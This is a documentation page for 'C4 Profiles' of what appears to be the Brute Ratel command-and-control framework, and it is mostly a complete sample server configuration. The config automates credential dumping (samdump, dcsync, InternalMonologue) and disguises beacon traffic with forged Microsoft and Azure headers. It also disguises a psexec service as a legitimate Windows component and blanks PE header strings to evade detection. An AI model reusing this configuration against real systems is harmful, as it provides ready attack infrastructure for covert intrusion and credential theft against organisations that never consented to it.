C4 Profilers

After creating a server using the -ratel option from the commandline, you can select the settings icon above the scratchpad to get the full server configuration.

Once you create a listener using Brute Commander, you can view the configuration as shown above and save the server configuration locally as a ‘.conf’ file. These configuration files are called C4 Profiles. Profilers can be used to quickly setup listeners, automate command executions, command queues for badgers, server user creation, adding custom commands to badgers, payload configurations and many more. Ratel server accepts a configuration file using ‘-c’ option.

Below is a sample configuration of the C4 profile.

{
    "admin_list": {
        "admin": "admin"
    },
    "auto_save": false,
    "autoruns": [
        "set_child werfault.exe",
        "sleep 2"
    ],
    "c2_handler": "0.0.0.0:8443",
    "click_script": {
        "Credential Dumping": [
            "samdump",
            "shadowclone",
            "dcsync"
        ],
        "Discovery": [
            "id",
            "pwd",
            "ipstats",
            "psreflect echo $psversiontable",
            "net users",
            "scquery"
        ]
    },
    "comm_enc_key": "pass@123",
    "credentials": [
        {
            "creddomain": "bruteratel.corp",
            "crednote": "Domain Admin Password",
            "credpass": "admin@123",
            "creduser": "administrator"
        },
        {
            "creddomain": "jupiter.solar.corp",
            "crednote": "Domain Admin Password",
            "credpass": "jupiter@123",
            "creduser": "administrator"
        },
    ],
    "register_dll": {
        "boxreflect": {
            "file_path": "server_confs/boxreflect.dll",
            "description": "Loads a test reflective dll message box",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "boxcheck",
            "minimumArgCount": 1,
            "replace_str": {
                "boxit": "\\x00\\x00\\x00\\x00\\x00",
                "!This program cannot ": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",
                "be run in DOS mode.": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
            }
        }
    },
    "register_pe": {
        "seatbelt": {
            "file_path": "server_confs/Seatbelt.exe",
            "description": "Runs Seatbelt C# executable",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "seatbelt",
            "minimumArgCount": 1
        },
        "monologue": {
            "file_path": "server_confs/InternalMonologue.exe",
            "description": "Runs InternalMonologue C# executable",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "monologue",
            "minimumArgCount": 1
        }
    },
    "register_obj": {
        "o_getprivs": {
            "file_path": "server_confs/getprivs.o",
            "description": "Get privilege of current user",
            "artifact": "WINAPI",
            "mainArgs": "NA",
            "optionalArg": "NA",
            "example": "o_getprivs",
            "minimumArgCount": 1
        }
    },
    "listeners": {
        "Primary-Https": {
            "auth_count": 1,
            "auth_type": false,
            "c2_authkeys": [
                "abcd@123"
            ],
            "c2_uri": [
                "content.php",
                "admin.php",
                "login.php",
                "content.js",
                "api"
            ],
            "extra_headers": {
                "Cache-Control": " no-cache",
                "Cookie": " AUTH-1babbba6265ca2eba78b65bda5e34545c32a95b2",
                "Host": "test.azureedge.net",
                "Pragma": " no-cache",
                "Referer": " https://mail.microsoft.com",
                "x-pm-apiversion": " 3",
                "x-pm-appversion": " Web_3.16.33",
                "x-pm-uid": " d0e1f5b0dc08202064de25a"
            },
            "host": "192.168.0.142",
            "is_random": false,
            "os_type": "windows",
            "port": "443",
            "rotational_host": "192.168.0.142",
            "ssl": true,
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
        }
    },
    "payload_config": {
        "auto-Primary-Https": {
            "c2_auth": "abcd@123",
            "c2_uri": [
                "content.php",
                "admin.php",
                "login.php",
                "content.js",
                "api"
            ],
            "extra_headers": {
                "Cache-Control": " no-cache",
                "Cookie": " AUTH-1babbba6265ca2eba78b65bda5e34545c32a95b2",
                "Host": "test.azureedge.net",
                "Pragma": " no-cache",
                "Referer": " https://mail.microsoft.com",
                "x-pm-apiversion": " 3",
                "x-pm-appversion": " Web_3.16.33",
                "x-pm-uid": " d0e1f5b0dc08202064de25a"
            },
            "host": "192.168.0.142",
            "port": "443",
            "ssl": true,
            "type": "HTTP",
            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"
        },
        "main_smb": {
            "c2_auth": "abcd@123",
            "smb_pipe": "\\\\.\\pipe\\mynamedpipe",
            "type": "SMB"
        },
        "main_tcp": {
            "c2_auth": "abcd@123",
            "host": "127.0.0.1",
            "port": "10000",
            "type": "TCP"
        }
    },
    "psexec_config": {
        "psexec_svc_desc": "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether universal apps installed from the Windows Store are declaring all of their permissions, like being able to access your telemetry, location or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user.",
        "psexec_svc_name": "TransactionBrokerService"
    },
    "ssl_cert": "cert.pem",
    "ssl_key": "key.pem",
    "user_list": {
        "brute": "password123",
        "ratel": "password123"
    },
    "users": {
        "active": {
            "admin": "06-01-2021 12:51:49"
        },
        "inactive": {}
    }
}